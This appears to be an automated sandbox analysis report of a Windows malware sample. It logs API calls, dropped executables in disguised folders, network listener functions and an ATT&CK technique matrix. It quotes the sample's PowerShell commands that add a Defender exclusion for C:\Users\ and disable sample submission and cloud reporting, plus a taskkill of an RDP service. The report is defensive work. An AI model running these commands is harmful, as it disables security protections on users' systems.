5_2_00007FF764CCFF1F

Source: C:\Users\user\AppData\Local\Temp\w8m7wmyk939oczmkw4o2h16hs.exe

Code function: 5_2_00007FF764CC45D5 fopen,_fsopen,fseek,_errno,_errno,_errno,_errno,_errno,_errno,_errno,_errno,ftell,_errno,_errno,_errno,_errno,fseek,fread,_errno,_errno,_errno,_errno,GetProcessHeap,HeapAlloc,_errno,_errno,_errno,_errno,GetProcessHeap,HeapFree,fclose,

5_2_00007FF764CC45D5

Source: C:\Users\user\Desktop\DF2.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\w8m7wmyk939oczmkw4o2h16hs.exe	Code function: 5_2_00007FF764CC1131 Sleep,Sleep,_amsg_exit,_initterm,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,_cexit,	5_2_00007FF764CC1131
Source: C:\Users\user\AppData\Local\Temp\w8m7wmyk939oczmkw4o2h16hs.exe	Code function: 5_2_00007FF764CD05D9 SetUnhandledExceptionFilter,	5_2_00007FF764CD05D9
Source: C:\Users\user\AppData\Local\Temp\w8m7wmyk939oczmkw4o2h16hs.exe	Code function: 5_2_00007FF764CDB6A0 SetUnhandledExceptionFilter,	5_2_00007FF764CDB6A0
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 21_2_00007FF76A901131 Sleep,Sleep,_amsg_exit,_initterm,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,_cexit,	21_2_00007FF76A901131

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Add-MpPreference -ExclusionPath 'C:\Users\'"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Add-MpPreference -ExclusionPath 'C:\Users\'"			Jump to behavior

Modifies Windows Defender protection settings

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Set-MpPreference -MAPSReporting 0"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Set-MpPreference -MAPSReporting 0"	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\w8m7wmyk939oczmkw4o2h16hs.exe

5_2_00007FF764CC292E

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Set-MpPreference -MAPSReporting 0"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Add-MpPreference -ExclusionPath 'C:\Users\'"	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 448 -p 7100 -ip 7100
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7100 -s 1220

Source: C:\Users\user\AppData\Local\Temp\nju2apmx83wqd9u7namsf59y.exe

Process created: C:\Windows\System32\taskkill.exe taskkill.exe /F /FI "SERVICES eq RDP-Controller"

Jump to behavior

Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nju2apmx83wqd9u7namsf59y.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Users\user\AppData\Local\Temp\w8m7wmyk939oczmkw4o2h16hs.exe

Code function: 5_2_00007FF764CC6FD5 GetSystemTimeAsFileTime,

5_2_00007FF764CC6FD5

Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe

Code function: 21_2_00007FFE0E1638C3 LocalAlloc,wcsncpy,LookupAccountNameW,GetLastError,GetLastError,LocalAlloc,LookupAccountNameW,LocalFree,GetLastError,ConvertSidToStringSidA,GetLastError,wcslen,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,NetApiBufferFree,NetUserEnum,GetProcessHeap,HeapAlloc,memcpy,GetProcessHeap,HeapFree,

21_2_00007FFE0E1638C3

Source: C:\Users\user\AppData\Local\Temp\nju2apmx83wqd9u7namsf59y.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: w8m7wmyk939oczmkw4o2h16hs.exe, 00000005.00000002.1697339890.0000023B624D8000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: MsMpEng.exe

Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 21_2_00007FFE0E16240A socket,htonl,htons,bind,listen,WSAGetLastError,WSAGetLastError,WSAGetLastError,	21_2_00007FFE0E16240A
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 21_2_00007FFE0EB44F8A socket,htonl,htons,bind,listen,WSAGetLastError,WSAGetLastError,WSAGetLastError,	21_2_00007FFE0EB44F8A
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 21_2_00007FFE1150240A socket,htonl,htons,bind,listen,WSAGetLastError,WSAGetLastError,WSAGetLastError,	21_2_00007FFE1150240A
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 21_2_00007FFE11EC254A socket,htonl,htons,bind,listen,WSAGetLastError,WSAGetLastError,WSAGetLastError,	21_2_00007FFE11EC254A
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 32_2_00007FFE1177240A socket,htonl,htons,bind,listen,WSAGetLastError,WSAGetLastError,WSAGetLastError,	32_2_00007FFE1177240A
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 32_2_00007FFE11BD4F8A socket,htonl,htons,bind,listen,WSAGetLastError,WSAGetLastError,WSAGetLastError,	32_2_00007FFE11BD4F8A
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 32_2_00007FFE11EC240A socket,htonl,htons,bind,listen,WSAGetLastError,WSAGetLastError,WSAGetLastError,	32_2_00007FFE11EC240A
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 32_2_00007FFE126D254A socket,htonl,htons,bind,listen,WSAGetLastError,WSAGetLastError,WSAGetLastError,	32_2_00007FFE126D254A
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 32_2_00007FFE13201ADA socket,htonl,htons,bind,listen,WSAGetLastError,WSAGetLastError,WSAGetLastError,	32_2_00007FFE13201ADA
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 32_2_00007FFE133015FA socket,htonl,htons,bind,listen,WSAGetLastError,WSAGetLastError,WSAGetLastError,	32_2_00007FFE133015FA
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 32_2_00007FFE1331B820 listen,htons,recv,select,	32_2_00007FFE1331B820
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 32_2_00007FFE1331B7E8 bind,	32_2_00007FFE1331B7E8
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 32_2_00007FFE1330A7F1 bind,	32_2_00007FFE1330A7F1

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	2 Valid Accounts	1 Windows Management Instrumentation	1 Scripting	1 DLL Side-Loading	21 Disable or Modify Tools	1 Network Sniffing	1 System Time Discovery	Remote Services	1 Archive Collected Data	2 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	3 Native API	1 DLL Side-Loading	2 Valid Accounts	1 Deobfuscate/Decode Files or Information	LSASS Memory	1 Account Discovery	Remote Desktop Protocol	Data from Removable Media	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	2 Command and Scripting Interpreter	1 Create Account	2 Access Token Manipulation	3 Obfuscated Files or Information	Security Account Manager	1 System Service Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	3 Service Execution	2 Valid Accounts	4 Windows Service	1 Timestomp	NTDS	3 File and Directory Discovery	Distributed Component Object Model	Input Capture	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	4 Windows Service	11 Process Injection	1 DLL Side-Loading	LSA Secrets	1 Network Sniffing	SSH	Keylogging	3 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	1 Services File Permissions Weakness	1 Services File Permissions Weakness	1 File Deletion	Cached Domain Credentials	24 System Information Discovery	VNC	GUI Input Capture	1 Proxy	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	21 Masquerading	DCSync	1 Network Share Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	2 Valid Accounts	Proc Filesystem	131 Security Software Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	2 Access Token Manipulation	/etc/passwd and /etc/shadow	31 Virtualization/Sandbox Evasion	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	31 Virtualization/Sandbox Evasion	Network Sniffing	2 Process Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	11 Process Injection	Input Capture	1 Application Window Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption
Gather Victim Org Information	DNS Server	Compromise Software Supply Chain	Windows Command Shell	Scheduled Task	Scheduled Task	1 Hidden Users	Keylogging	1 System Owner/User Discovery	Taint Shared Content	Screen Capture	DNS	Exfiltration Over Physical Medium	Resource Hijacking
